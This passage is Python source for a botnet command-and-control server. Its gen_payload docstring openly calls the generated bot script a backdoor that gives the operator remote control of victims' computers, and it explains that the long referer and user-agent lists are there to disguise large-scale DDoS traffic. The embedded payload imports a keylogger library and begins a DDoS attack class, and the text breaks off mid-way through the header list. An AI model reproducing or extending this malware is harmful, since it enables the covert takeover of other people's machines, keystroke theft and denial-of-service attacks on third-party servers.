Botnet.".encode()) except: pass if conn == self.focus_conn: self.send_to_other("SERVER",self.admin_username,f"The Bot you were focusing on has disconnected from the Botnet, going back to normal.", self.adminconn) self.focusing = False self.focus_conn = None self.focus_botname = "" self.downloading = False try: self.connlist.remove(conn) except: pass conn.close() break def gen_payload(self): """The Payload script is located here. It is generated based on the server variables in the '__init__' function. 
This is what the bots use to connect to the server. This script is really a backdoor, which opens the victim to having their computer controlled remotely by the admin. There are a lot of referer and useragent tags, and the reason for that is the DDoS Function. If the user, for whatever reason wants to commit a large scale DDoS Attack, they need to have uniqueness with the HTTP Headers, so that it could help confuse the server they are attacking, and eventually bring it down(Servers are really secure nowadays and DDoSing is illegal, so only DDoS Your own servers please). There is also all of the code needed for controlling the bot. The functions are divided into different classes, with the 3 types of DDoS Functions divided into different classes, with the main bot code in one separate class itself.""" payload = """ import socket, threading, os, sys, urllib.request, random, time, shutil, subprocess, sqlite3 try: from cryptography.fernet import Fernet from pynput.keyboard import Listener except: pass class DDoS: def __init__(self, ip, delay): self.ip = ip self.delay = delay self.stopatk = False self.useragents = self.obtain_user_agents() self.referers = self.obtain_referers() self.threader = threading.Thread(target=self.start_thr) self.threader.start() def obtain_referers(self): referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..', 'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=query?=query=..', 'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925', 'http://yandex.ru/yandsearch?text=', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832', 'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..', 'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..', 'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..', 'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..', 'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..', '/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882', 'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..', 'http://www.google.ru/url?sa=t&rct=?j&q=&e..', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=', 'http://www.ask.com/web?q=', 'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=', 
'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=', 'http://host-tracker.com/check_page/?furl=', 'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=', 'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=', 'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=', 'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=', 'https://developers.google.com/speed/pagespeed/insights/?url=', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q='] return referers def obtain_user_agents(self): user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14', 'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15', 'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14', 'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) 
AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) 
Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) 
Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 
(Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 